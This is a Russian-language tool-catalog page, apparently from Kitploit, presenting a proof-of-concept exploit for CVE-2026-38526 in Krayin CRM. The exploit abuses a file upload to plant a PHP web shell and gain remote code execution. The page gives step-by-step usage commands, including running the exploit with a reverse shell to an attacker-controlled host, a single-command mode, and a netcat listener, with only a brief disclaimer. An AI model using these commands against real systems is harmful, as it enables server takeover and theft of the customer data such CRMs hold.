Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-38526-POC — Доказательство концепции для CVE-2026-38526 в Krayin CRM <= v2.2.x. Произвольная загрузка файлов, приводящая к удаленному выполнению кода. | Kitploit
Инструменты/GitHubGitHub/pawpic/cve-2026-38526-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubpawpic/cve-2026-38526-poc

CVE-2026-38526-POC

Доказательство концепции для CVE-2026-38526 в Krayin CRM <= v2.2.x. Произвольная загрузка файлов, приводящая к удаленному выполнению кода.

Репозиторий
21 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-38526 - Krayin CRM RCE-эксплоит

Krayin CRM (≤ 2.2.x) - Неограниченная загрузка файлов, приводящая к удаленному выполнению кода.

Этот PoC использует уязвимую конечную точку загрузки TinyMCE (/admin/tinymce/upload) для загрузки PHP-веб-шелла и выполнения команд на сервере.


Возможности

  • Полный автоматический вход с обработкой CSRF-токена
  • Обходит ограничения загрузки с помощью двойного расширения
  • Поддерживает reverse shell и выполнение одной команды
  • Надежное обновление CSRF-токена Laravel
  • Чистый и простой в использовании

Загрузка

root@kitploit:~
git clone https://github.com/pawpic/CVE-2026-38526-POC

Требования

root@kitploit:~
pip3 install requests beautifulsoup4

Использование

  1. Reverse Shell (по умолчанию и рекомендуется)
root@kitploit:~
python3 exploit.py \
  -u http://example.com \
  -e [email protected] \
  -p "example_pass" \
  --lhost YOUR_IP \
  --lport 4444
  1. Одиночная команда
root@kitploit:~
python3 exploit.py \
  -u http://example.com \
  -e [email protected] \
  -p "example_pass" \
  -c "whoami"

Параметры

Пример рабочего процесса

Запустите слушатель:

root@kitploit:~
nc -lvnp 4444

Запустите эксплоит:

root@kitploit:~
python3 exploit.py -u http://target.com -e [email protected] -p password --lhost IP_ADDR

Отказ от ответственности

Этот эксплоит предназначен только для образовательных целей и авторизованного тестирования на проникновение. Несанкционированное использование против систем, на которые у вас нет явного разрешения для тестирования, незаконно.

Затронутые версии

Krayin CRM ≤ 2.2.x CVE: CVE-2026-38526

Автор: pawpic Дата: 2026

Скачать инструмент
АргументОписаниеОбязательный
-u, --urlБазовый URL целиДа
-e, --emailEmail для входаДа
-p, --passwordПароль для входаДа
-c, --cmdВыполнить одиночную командуНет
--lhostВаш IP для reverse shellДа (если не используется --cmd)
--lportПорт прослушиванияНет (по умолчанию: 4444)